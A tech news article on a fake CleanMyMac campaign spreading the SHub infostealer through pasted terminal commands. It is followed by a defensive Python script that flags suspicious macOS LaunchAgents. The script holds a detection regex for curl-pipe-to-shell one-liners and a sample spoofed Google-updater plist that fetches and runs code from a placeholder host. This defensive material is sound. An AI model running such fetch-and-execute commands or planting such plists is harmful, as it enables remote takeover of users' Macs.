TechRadar
Sead Fadilpašić

'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets

AI and cybersecurity.

  • Fake CleanMyMac utility spreads SHub infostealer
  • Attack tricks users into pasting terminal commands
  • Malware steals credentials, crypto, and persists via backdoor

A fake utility program for macOS is tricking users into installing infostealer malware that exfiltrates passwords, sensitive files, and even money, experts have warned. Security researchers at Malwarebytes said the program was part of a wider, highly sophisticated campaign that also included a custom website, reputable-brand spoofing, a loader, and the well-worn ClickFix technique.

The researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program built by MacPaw, with an almost identical website on the cleanmymacos[DOT]org domain that is easy to mistake for the real one. However, instead of simply downloading and running an installer, victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.

Stealing files and establishing persistence

“Instead of exploiting a vulnerability, it tricks the user into running the malware themselves,” Malwarebytes explained. “Because the command is executed voluntarily, protections such as Gatekeeper, notarization checks, and XProtect offer little protection once the user pastes the command and presses Return.”

The malware installed this way is called SHub, and during installation it asks the victim for their macOS password. Because the whole installation process is unorthodox and looks like something a power user might do, victims may dismiss the prompt as standard practice, the researchers explained. The password, however, gives SHub access to the macOS Keychain, Wi-Fi credentials, app tokens, and other private keys. “With the password in hand, SHub begins a systematic sweep of the machine,” the Malwarebytes researchers said.

After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files, and other valuables, it drops a stage-two backdoor that replaces some cryptocurrency wallet apps with malicious copies. That way the malware maintains persistence and enables additional crypto theft down the line. Finally, the attackers install a LaunchAgent that masquerades as a Google update service. “In practice, this gives the attackers the ability to run commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concluded.
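The two hooks the article describes, a pasted fetch-and-execute command and a LaunchAgent dressed up as a Google updater, are both visible on disk, so a responder can triage a Mac's LaunchAgent plists for exactly those traits. The script below is an added example written for this article, not Malwarebytes' tooling and not SHub's actual plist: the sample plists are constructed, and the heuristics (what counts as a Google install directory, which drop directories are suspicious, the shape of a curl-pipe-shell one-liner) are assumptions to tune for your own fleet.

```python
"""Triage macOS LaunchAgent plists for spoofed-vendor persistence (added example)."""
import plistlib
import re
import sys
from pathlib import Path

# Fetch-and-execute one-liners of the ClickFix shape: "curl ... | sh",
# "wget ... | bash", "base64 -d ... | sh". Assumption: tune the pattern locally.
FETCH_AND_EXEC = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z)?sh\b"
    r"|base64\s+(?:-d|-D|--decode)[^|]*\|\s*(?:ba|z)?sh\b",
    re.I,
)

# Where dropped payloads tend to live, as opposed to where software is installed.
DROP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/", "/Users/Shared/")


def program_of(plist: dict) -> str:
    """Executable the agent launches: ProgramArguments[0] takes precedence over Program."""
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else str(plist.get("Program", ""))


def triage_launch_agent(raw: bytes) -> list:
    """Return finding tags for one LaunchAgent plist (XML or binary); empty means nothing odd."""
    plist = plistlib.loads(raw)
    label = str(plist.get("Label", ""))
    program = program_of(plist)
    cmdline = " ".join(str(a) for a in plist.get("ProgramArguments") or [])
    findings = []

    # 1. Label borrows Google's name but the binary is not under a Google install path.
    #    Assumption: Google's real updater lives under .../Library/Google/ or /Applications/Google*.
    if (re.search(r"\bgoogle\b", label, re.I)
            and "/Library/Google/" not in program
            and not program.startswith("/Applications/Google")):
        findings.append("vendor-label-mismatch")

    # 2. Executable sits in a drop directory rather than an install location.
    if program.startswith(DROP_DIRS):
        findings.append("program-in-drop-dir")

    # 3. The "program" is a shell running an inline fetch-and-execute one-liner.
    if FETCH_AND_EXEC.search(cmdline):
        findings.append("fetch-and-execute")

    # 4. RunAtLoad + KeepAlive turns any of the above into a restart-proof backdoor;
    #    only reported alongside another finding so ordinary agents are not flagged.
    if findings and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("persistent-keepalive")
    return findings


def scan_directory(directory: str) -> dict:
    """Triage every *.plist in a directory (e.g. ~/Library/LaunchAgents); unparseable files are reported too."""
    results = {}
    for p in sorted(Path(directory).expanduser().glob("*.plist")):
        try:
            hits = triage_launch_agent(p.read_bytes())
        except Exception as exc:  # a malformed plist in LaunchAgents is itself worth a look
            hits = ["unparseable:" + type(exc).__name__]
        if hits:
            results[str(p)] = hits
    return results


# Constructed samples for demonstration; not artifacts recovered from the campaign.
LEGIT_KEYSTONE = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": [
        "/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle"
        "/Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
        "-runMode", "ifneeded",
    ],
    "RunAtLoad": True,
})
SPOOFED_UPDATER = plistlib.dumps({
    "Label": "com.google.update.service",
    "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL http://example.invalid/u | sh"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
DROPPED_HELPER = plistlib.dumps({
    "Label": "com.example.helper",
    "Program": "/private/tmp/.helper",
})

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "~/Library/LaunchAgents"
    for path, hits in scan_directory(target).items():
        print(path, ", ".join(hits))
```

Run it with no arguments to sweep the current user's LaunchAgents, or pass a directory (a mounted image's `Library/LaunchAgents`, or `/Library/LaunchDaemons` for root-level persistence). The spoofed sample trips three rules at once; the real Keystone-style agent trips none, which is the point of keying the vendor check on the executable's path rather than on the label alone.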

